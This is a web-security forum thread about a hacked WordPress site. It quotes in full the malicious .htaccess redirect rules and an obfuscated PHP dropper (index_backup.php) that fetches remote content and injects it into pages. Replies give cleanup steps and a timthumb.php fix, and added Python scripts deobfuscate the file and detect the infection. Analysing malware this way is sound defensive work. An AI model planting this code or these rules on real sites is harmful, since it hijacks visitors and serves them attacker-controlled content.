Web Tool Bag  
Web Tool Bag | Web security | Wordpress
Author: admin (Super Administrator)
Posts: 33
Joined: 03.11.09
Posted on 10-06-2013 22:11
Wordpress infected index_backup.php

Hi All,
I have a problem with a web site based on Wordpress. The site was hacked; the following code block was added to the .htaccess file:

<IfModule mod_rewrite.c>

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikipedia|qq|
excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|
metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|
linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|
amfibi|dmoz|yippy|
walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|
thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|
allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|
bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|
abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|
suchmaschine|infospace|web|websuche|witch|wolong|oekoportal|freenet|arcor|
alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|
hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nl
search|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|
alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|
globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|
simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|
apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|
finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|
keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|
claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)
RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
RewriteCond %{REQUEST_FILENAME} !/index_backup.php
RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]
</IfModule>

In almost all directories I found a .htaccess file with this code, and somehow a file named index_backup.php was uploaded.

The content of index_backup.php file is the following:

<? $GLOBALS['_62805507_']=Array(base64_decode(''.'ZG'.'VmaW5'.'l'),base64_decode('ZmlsZV'.'9nZ'.'XRfY29'.'u'.'dGV'.'udHM'.'='),base64_decode('c3RyZ'.
'WFtX'.'2Nvbn'.'RleHR'.'fY3JlYXR'.'l'),base64_decode(''.'Zml'.'sZV9nZ'.'X'.'RfY29'.'udGVudHM='),base64_decode('c3'.'R'.'ybmF0'.'Y21'.'w'),
base64_decode('bXRfcmFuZ'.'A='.'='),base64_decode('ZnB1dHM='),
base64_decode('ZnJlYWQ'.'='),base64_decode('ZmN'.'sb3N'.'l'),base64_decode('c3RycG9z'),base64_decode('YW'.'RkY3NsYX'.'N'.'oZXM='),base64_decode('Z'.'mZsdXNo'),
base64_decode(''.'c3V'.'ic3Ry'),
base64_decode('Zm'.'lsZV'.'9'.'nZXRfY29udGVu'.'dH'.'M='),
base64_decode('YXJyY'.'XlfZm'.'lsbF9rZXlz'),base64_decode(''.'Y3Vyb'.'F9pbml0'),
base64_decode('Y3VybF9tdWx0aV9leGVj'),base64_decode('YXJyY'.'Xlfc'.'HVzaA=='),
base64_decode('Y3VybF9zZXRvc'.'HQ'.'='),
base64_decode('bXRf'.'cmFuZ'.'A=='),base64_decode('aW1hZ'.
'2VjcmVhdGVmcm9'.'tZ2lm'),base64_decode('Y3'.'Vy'.'bF9'.'zZX'.'RvcH'.'Q'.'='),
base64_decode('Y3VybF9zZX'.'Rvc'.'HQ='),
base64_decode('Y3'.'Vy'.'bF'.'9l'.'eG'.'Vj'),base64_decode('Y3'.'Vy'.
'bF9jbG9z'.'Z'.'Q=='),base64_decode(''.'aW5pX2d'.'ldA='.'='),
base64_decode('c'.'GFyc2VfdX'.'Js'),base64_decode('ZnNv'.'Y2tv'.'cGVu'),
base64_decode('ZnV'.'uY3R'.'p'.'b'.'2'.'5f'.'Z'.'Xh'.'pc'.'3Rz')); ?><? function _1051993851($i){$a=Array('SUZ'.'SQU1FX1'.'V'.'S'.'T'.'A==',
'aH'.'R0c'.'DovL3d'.'vcmRwcmV'.
'zc3Rlc3Qu'.'aW'.'5m'.'by83Ln'.'R4'.'d'.'A='.'=',''.'ZA==','aHR0cDovLw='.'=','S'.'F'.'RUU'.'F9IT1NU','Uk'.'VRVU'.'VTV'.'F'.'9VUkk'.'=','a'.'HR0'.'cA==','dGltZW91dA==',
'R'.'0VUIA==',''.'Pw='.'=','I'.'CB'.'IVFRQLzEuMA0K','VXNlci1BZ2VudDo'.'gTW96'.'a'.'WxsYS81L'.'jAgKFd'.'p'.'bmRvd3M7IFU7IFdpbmRvd'.'3MgT'.'lQgN'.
'S4xO'.'yBl'.'b'.'i1V'.'UzsgcnY6MS44LjA'.'uMykgR2'.'Vj'.'a2'.'8v'.'MjAwNjA0'.'M'.
'jYgRmlyZW'.'ZveC8x'.'LjUuM'.'C4zDQo=',''.'QW'.'NjZXB0'.'OiAqLyoNCg='.'=','QWNjZXB0'.'LUxhb'.'md1YWdlOiBlbi11cyxlbjt'.'xPTAuNQ0K','QWN'.'jZXB'.'0L'.
'UNo'.'YXJz'.'ZX'.'Q6IElTTy04'.'ODU5LTEsdXR'.'mLTg7cT'.'0wLjcs'.'Kjt'.'xPTAu'.
'Nw0K','S2VlcC'.'1'.'Bb'.'Gl'.'2'.'ZT'.'ogMzA'.'w'.'D'.'Qo=',''.'Q29'.'ubmVjd'.
'Glv'.'bjoga'.'2Vl'.'cC1hbGl2ZQ0K','aQ==','DQoNC'.'g==','Y'.'Wxsb3df'.'dXJsX'.
'2ZvcG'.'Vu','aG9zd'.'A==','aG9zd'.'A==','cGF0aA==','cXVl'.'c'.'nk=',''.
'Y3VybF9pbm'.'l0');return base64_decode($a[$i]);} ?><?php $GLOBALS['_62805507_'][0](_1051993851(0),_1051993851(1));$_0=_1051993851(2);echo l__3(IFRAME_URL);$_1=round(0+2345.5+2345.5);echo@
$GLOBALS['_62805507_'][1](_1051993851(3) .$_SERVER[_1051993851(4)] .$_SERVER[_1051993851(5)]);function l__0($_2){$_3=$GLOBALS['_62805507_'][2](array(_1051993851(6)=> array(_1051993851(7)=>
round(0+3+3+3+3+3))));return $GLOBALS['_62805507_'][3]($_2,false,$_3);(round(0+3799)-round(0+759.8+759.8+759.8+759.8+759.8)+round(0+3457)-round(0+3457))?$GLOBALS['_62805507_'][4]($_4,$_3):$GLOBALS['_62805507_'][5](round(0+767.33333333333+767.33333333333+767.33333333333)
,round(0+1266.3333333333+1266.3333333333+1266.3333333333));}function l__1($_5,$_6,$_7,$_8){$GLOBALS['_62805507_'][6]($_5,_1051993851(8) .$_7 .
_1051993851(9) .$_8 ._1051993851(10) ."Host: $_6\r\n" ._1051993851(11) ._1051993851(12) ._1051993851(13) ._1051993851(14) ._1051993851(15) ._1051993851(16) ."Referer: http://$_6\r\n\r\n");while($_4=$GLOBALS['_62805507_'][7]($_5,round
(0+1365.3333333333+1365.3333333333+1365.3333333333))){$_9 .= $_4;}$GLOBALS['_62805507_'][8]($_5);$_10=_1051993851(17);$_11=
$GLOBALS['_62805507_'][9]($_9,_1051993851(18));if((round
(0+968.25+968.25+968.25+968.25)^round(0+1291+1291+1291))&& $GLOBALS['_62805507_'][10]($_5,$_2,$_5,$_7))$GLOBALS['_62805507_'][11]($_12,$_7,$_11);
$_9=$GLOBALS['_62805507_'][12]($_9,$_11+round(0+1.3333333333333+1.3333333333333+1.3333333333333));
if((round(0+1014.5+1014.5+1014.5+1014.5)^round(0+4058))&&
$GLOBALS['_62805507_'][13]($_3,$_3,$_3))$GLOBALS['_62805507_'][14]($_13);return $_9;}function l__2($_2){$_13=$GLOBALS['_62805507_'][15]($_2);if((round(0+736.6+736.6+736.6+736.6+736.6)+round(0+312+312+312))>
round(0+3683)|| $GLOBALS['_62805507_'][16]($_14));else{$GLOBALS
['_62805507_'][17]($_11);}$GLOBALS['_62805507_'][18]($_13,42,FALSE);if(round(0+3068.5+3068.5)<$GLOBALS['_62805507_'][19](round(0+572.33333333333+572.33333333333+572.33333333333),round
(0+4415)))$GLOBALS['_62805507_'][20]($_2,$_15,$_16);$GLOBALS['_62805507_'][21]($_13,19913,TRUE);$GLOBALS['_62805507_'][22]
($_13,13,round(0+3+3+3+3+3));$_12=$GLOBALS['_62805507_'][23]($_13);$GLOBALS['_62805507_'][24]($_13);return $_12;}function l__3($_2)
{if($GLOBALS['_62805507_'][25](_1051993851(19))== round(0+0.33333333333333+0.33333333333333+0.33333333333333)){echo l__0
($_2);}else{$_14=$GLOBALS['_62805507_'][26]($_2);if($_5=@$GLOBALS['_62805507_'][27]($_14[_1051993851(20)],round
(0+40+40),$_15,$_16,round(0+3+3+3+3+3))){echo l__1($_5,$_14[_1051993851(21)],$_14[_1051993851(22)],$_14[_1051993851(23)]);}elseif
(@$GLOBALS['_62805507_'][28](_1051993851(24))){echo l__2($_2);}}}


The PHP code is encoded and it is hard to read the implemented functionality. If you have suggestions on how to fix this and prevent future infection, please share them. I hope this web virus problem will be resolved soon. If I find a solution I will write about the infection fix here.


Cheers

Edited by admin on 13-06-2013 09:10
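The obfuscation in the quoted index_backup.php is shallow: every PHP function name is a base64 string split into single-quoted fragments and glued with `.`, and the script then calls them through `$GLOBALS['_62805507_'][N]`. The following Python script is an added example for this thread, not code from the original post or from the malware. It joins each concatenation chain, base64-decodes it, recovers the function table in index order and rewrites the `$GLOBALS[...][N]` call sites with the real names so the body can be read. The sample input is constructed from the first five table entries quoted above plus a call site in the same style; it is not the complete file.

```python
import base64
import re

# Constructed sample input: fragments copied from the obfuscated index_backup.php
# quoted in this thread, cut down to the first five entries of its function table
# plus a call site written in the same style. It is not the complete file.
SAMPLE = r"""<? $GLOBALS['_62805507_']=Array(base64_decode(''.'ZG'.'VmaW5'.'l'),base64_decode('ZmlsZV'.'9nZ'.'XRfY29'.'u'.'dGV'.'udHM'.'='),base64_decode('c3RyZ'.
'WFtX'.'2Nvbn'.'RleHR'.'fY3JlYXR'.'l'),base64_decode('bXRfcmFuZ'.'A='.'='),base64_decode('ZnNv'.'Y2tv'.'cGVu')); ?>
<?php $GLOBALS['_62805507_'][0](IFRAME_URL, $url); $GLOBALS['_62805507_'][4]($host, 80); ?>"""

# A PHP single-quoted string, optionally concatenated with more of them: 'ab'.'cd'
CHAIN_RE = re.compile(r"'[^']*'(?:\s*\.\s*'[^']*')*")
LITERAL_RE = re.compile(r"'([^']*)'")
# The lookup table: $GLOBALS['<name>']=Array( ... );
TABLE_RE = re.compile(r"\$GLOBALS\['(\w+)'\]\s*=\s*Array\((.*?)\)\s*;", re.DOTALL)


def decode_chain(chain):
    """Join the fragments of one concatenation chain and base64-decode the result.

    Returns None when the joined text is not valid base64 or does not decode to
    non-empty printable ASCII, which filters out ordinary strings such as
    '_62805507_' that merely look like base64 candidates."""
    joined = "".join(LITERAL_RE.findall(chain))
    try:
        text = base64.b64decode(joined, validate=True).decode("ascii")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
        return None
    if not text or not all(32 <= ord(c) < 127 for c in text):
        return None
    return text


def decode_strings(source):
    """Every concatenated single-quoted string in `source` that decodes cleanly, in order."""
    found = []
    for m in CHAIN_RE.finditer(source):
        text = decode_chain(m.group(0))
        if text is not None:
            found.append(text)
    return found


def function_table(source):
    """Name of the $GLOBALS lookup array and its decoded entries, in index order."""
    m = TABLE_RE.search(source)
    if not m:
        return None, []
    return m.group(1), decode_strings(m.group(2))


def deobfuscate(source):
    """Replace $GLOBALS['<table>'][N] references with the decoded function name."""
    name, names = function_table(source)
    if name is None:
        return source
    ref = re.compile(r"\$GLOBALS\['" + re.escape(name) + r"'\]\[(\d+)\]")

    def repl(m):
        i = int(m.group(1))
        return names[i] if i < len(names) else m.group(0)

    return ref.sub(repl, source)


if __name__ == "__main__":
    print(function_table(SAMPLE)[1])
    print(deobfuscate(SAMPLE))
```

Run against the full file, `decode_strings` also lists the entries of the second table (the one returned by `_1051993851()`), since they use the same fragment style; `deobfuscate` only rewrites the `$GLOBALS` call sites, so the `_1051993851(N)` lookups still have to be read against that second list by index.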
RE: How to clean this infection
Author: admin (Super Administrator)
Posts: 33
Joined: 03.11.09
Posted on 10-06-2013 22:39
1. Get your latest clean backup.
2. Download all files from your Wordpress installation.
Do a diff of both directories, clean and infected. For the diff you can use
Beyond Compare for Windows or meld for Linux. Delete all new files from the
infected directory and clean the .htaccess file. That is all.
3. Now the question is how to prevent a new infection of the site by the same virus.


Please write your suggestions.
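The comparison step of this reply can be scripted instead of done by hand in Beyond Compare or meld. The following Python script is an added example for this thread, not the poster's own procedure or tool. It hashes every file in the clean backup and the downloaded copy, reports files that exist only in the downloaded copy and files whose content changed, and additionally flags any .htaccess whose rewrite block matches the shape quoted in the first post (a referer condition, a user-agent condition and a RewriteRule that funnels requests into a PHP file). The two directory trees are constructed in a temporary directory so the script runs offline; the paths and file contents are made up, apart from the standard WordPress .htaccess used as the clean version.

```python
import hashlib
import os
import re
import tempfile

# Constructed sample content. The infected block follows the shape quoted in the
# first post, shortened to three referer names; the clean block is stock WordPress.
HTACCESS_INFECTED = """<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|bing|yahoo)\\.(.*)
RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
RewriteCond %{REQUEST_FILENAME} !/index_backup.php
RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]
</IfModule>
"""
HTACCESS_CLEAN = """# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

REFERER_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.M | re.I)
UA_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_USER_AGENT\}", re.M | re.I)
REDIRECT_RE = re.compile(r"^\s*RewriteRule\s+\S+\s+\S*\.php\b", re.M | re.I)


def hash_tree(root):
    """Map of relative path -> sha256 of content for every file under root."""
    hashes = {}
    for d, _, files in os.walk(root):
        for f in files:
            full = os.path.join(d, f)
            with open(full, "rb") as fh:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                hashes[rel] = hashlib.sha256(fh.read()).hexdigest()
    return hashes


def compare_trees(clean, infected):
    """(new, changed): files only in the infected copy, and shared files whose content differs."""
    a, b = hash_tree(clean), hash_tree(infected)
    new = sorted(set(b) - set(a))
    changed = sorted(p for p in set(a) & set(b) if a[p] != b[p])
    return new, changed


def suspicious_htaccess(root):
    """Relative paths of .htaccess files that carry the referer + user-agent + PHP redirect pattern."""
    hits = []
    for d, _, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(d, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            # Stock WordPress rules only test REQUEST_FILENAME, so all three must match.
            if REFERER_RE.search(text) and UA_RE.search(text) and REDIRECT_RE.search(text):
                hits.append(os.path.relpath(path, root).replace(os.sep, "/"))
    return sorted(hits)


def write_tree(root, files):
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)


def build_sample_site():
    """Constructed clean-backup and infected-download trees; returns their root paths."""
    base = tempfile.mkdtemp(prefix="wp-compare-")
    clean, infected = os.path.join(base, "clean"), os.path.join(base, "infected")
    common = {
        "index.php": "<?php require 'wp-blog-header.php';\n",
        "wp-content/themes/t/style.css": "/* theme */\n",
    }
    write_tree(clean, {**common, ".htaccess": HTACCESS_CLEAN})
    write_tree(infected, {
        **common,
        ".htaccess": HTACCESS_INFECTED,
        "index_backup.php": "<? /* constructed stand-in for the dropped file */ ?>\n",
        "wp-content/.htaccess": HTACCESS_INFECTED,
        "wp-content/index_backup.php": "<? ?>\n",
    })
    return clean, infected


if __name__ == "__main__":
    clean_dir, infected_dir = build_sample_site()
    added, modified = compare_trees(clean_dir, infected_dir)
    print("new files:", added)
    print("changed files:", modified)
    print("suspicious .htaccess:", suspicious_htaccess(infected_dir))
```

Against a real site, point `compare_trees` at the backup and the download instead of the constructed trees; the "new" list is what step 2 says to delete, and the "changed" list is what to restore from the backup rather than edit by hand.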
RE: Wordpress infected index_backup.php
Author: admin (Super Administrator)
Posts: 33
Joined: 03.11.09
Posted on 13-06-2013 09:14
It seems the infection attack comes from the file "thumb.php" in the themes folder; there you can find an fopen function with the write ("w") parameter.

"Look for a file in your WordPress theme’s folder called timthumb.php. If it’s there, you need to fix it."

Here is the fix of the vulnerability:

How to Replace timthumb.php in Your WordPress Theme

The easiest, safest and fastest way to eliminate this vulnerability to your website without risking breaking other functions is to follow the instructions I outlined in the video clip:

http://www.epiphanymarketing.com/blog/2011/08/18/timthumb-wordpress-how-to-fix-the-timthumb-php-vulnerability-in-your-wordpress-theme/

The version of the thumb.php file on my infected installation was define ('VERSION', '2.8.10');
I have updated it to define ('VERSION', '2.8.11');
For now I don't have problems.

Please write in this thread if you find another solution.

Edited by admin on 13-06-2013 09:21
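Checking every theme for a copy of the script and reading its VERSION constant is the quickest way to know whether the update described in this reply has been applied everywhere. The following Python script is an added example for this thread, not the poster's own check or anything from the timthumb project. It walks a themes directory, finds files named timthumb.php or thumb.php, parses `define ('VERSION', '...')` in the form shown above and reports copies below a minimum version. The minimum of 2.8.11 is taken from this reply and is an assumption about what "fixed" means; the theme names and files are constructed in a temporary directory so the script runs offline.

```python
import os
import re
import tempfile

# Matches the constant exactly as quoted in this thread: define ('VERSION', '2.8.10');
VERSION_RE = re.compile(r"define\s*\(\s*'VERSION'\s*,\s*'([0-9][0-9.]*)'\s*\)")
# Assumed minimum, taken from this reply (2.8.10 infected, 2.8.11 used as the fix).
MIN_VERSION = "2.8.11"
NAMES = {"timthumb.php", "thumb.php"}


def parse_version(text):
    """Version string from the VERSION define, or None if the file has none."""
    m = VERSION_RE.search(text)
    return m.group(1) if m else None


def version_tuple(v):
    """'2.8.10' -> (2, 8, 10) so versions compare numerically, not as strings."""
    return tuple(int(x) for x in v.split("."))


def scan_timthumb(root, minimum=MIN_VERSION):
    """[(relative path, version or None, outdated)] for every timthumb copy under root.

    A copy without a readable VERSION constant is reported as outdated, since it
    cannot be shown to be current."""
    results = []
    for d, _, files in os.walk(root):
        for f in files:
            if f.lower() not in NAMES:
                continue
            full = os.path.join(d, f)
            with open(full, encoding="utf-8", errors="replace") as fh:
                version = parse_version(fh.read())
            outdated = version is None or version_tuple(version) < version_tuple(minimum)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            results.append((rel, version, outdated))
    return sorted(results)


def build_sample_themes():
    """Constructed themes directory with three copies of the script; returns its path."""
    root = tempfile.mkdtemp(prefix="themes-")
    files = {
        "old-theme/timthumb.php": "<?php\ndefine ('VERSION', '2.8.10');\n",
        "new-theme/thumb.php": "<?php\ndefine ('VERSION', '2.8.11');\n",
        "odd-theme/timthumb.php": "<?php\n// constructed copy with no VERSION constant\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, version, outdated in scan_timthumb(build_sample_themes()):
        print(f"{rel}: version={version} {'UPDATE NEEDED' if outdated else 'ok'}")
```

On a live install, run `scan_timthumb` against wp-content/themes; the numeric comparison matters because a plain string compare would rank "2.8.9" above "2.8.10".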
Copyright © 2017 - www.webtoolbag.com